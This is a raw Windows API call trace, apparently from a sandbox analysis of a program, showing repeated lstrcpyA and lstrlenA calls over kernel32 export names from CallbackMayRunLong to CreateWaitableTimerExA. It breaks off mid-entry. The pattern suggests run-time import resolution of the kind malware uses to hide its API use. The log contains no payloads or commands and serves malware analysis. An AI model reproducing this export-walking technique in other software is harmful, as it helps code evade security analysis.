[0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.939] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.939] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.939] lstrlenA (lpString="CANCELIO") returned 8 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.939] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.939] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.939] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.939] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.939] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.939] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.939] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.940] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.940] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.940] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.940] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.940] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.940] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.940] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.940] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.940] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.940] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.940] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.940] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.940] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.940] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.940] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.940] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.940] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.940] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.940] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.941] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.941] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.941] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.941] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.941] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.941] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.941] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.941] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.941] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.941] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.941] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.941] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.941] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.941] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.941] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.941] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.941] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.941] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.941] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.942] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.942] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.942] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.942] lstrlenA (lpString="COPYFILEA") returned 9 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.942] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.942] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.942] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.942] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.942] lstrlenA (lpString="COPYFILEW") returned 9 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.942] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.942] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.942] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.942] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.942] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.942] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.942] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.942] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.942] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.942] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.943] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.943] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.943] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.943] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.943] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.943] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.943] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.943] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.943] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.943] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.943] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.943] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.943] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.943] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.943] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.943] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.943] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.943] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.943] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.943] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.944] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.944] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.944] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.944] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.944] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.944] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.944] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.944] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.944] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.944] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.944] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.944] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.944] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.944] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.944] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.944] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.944] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.944] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.944] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.944] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.945] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.945] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.945] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.945] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.945] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.945] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.945] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.945] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.945] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.945] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.945] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.945] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.945] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.945] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.945] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.945] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.945] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.945] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.946] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.946] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.946] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.946] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.946] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.946] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.946] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.946] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.946] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.946] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.946] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") 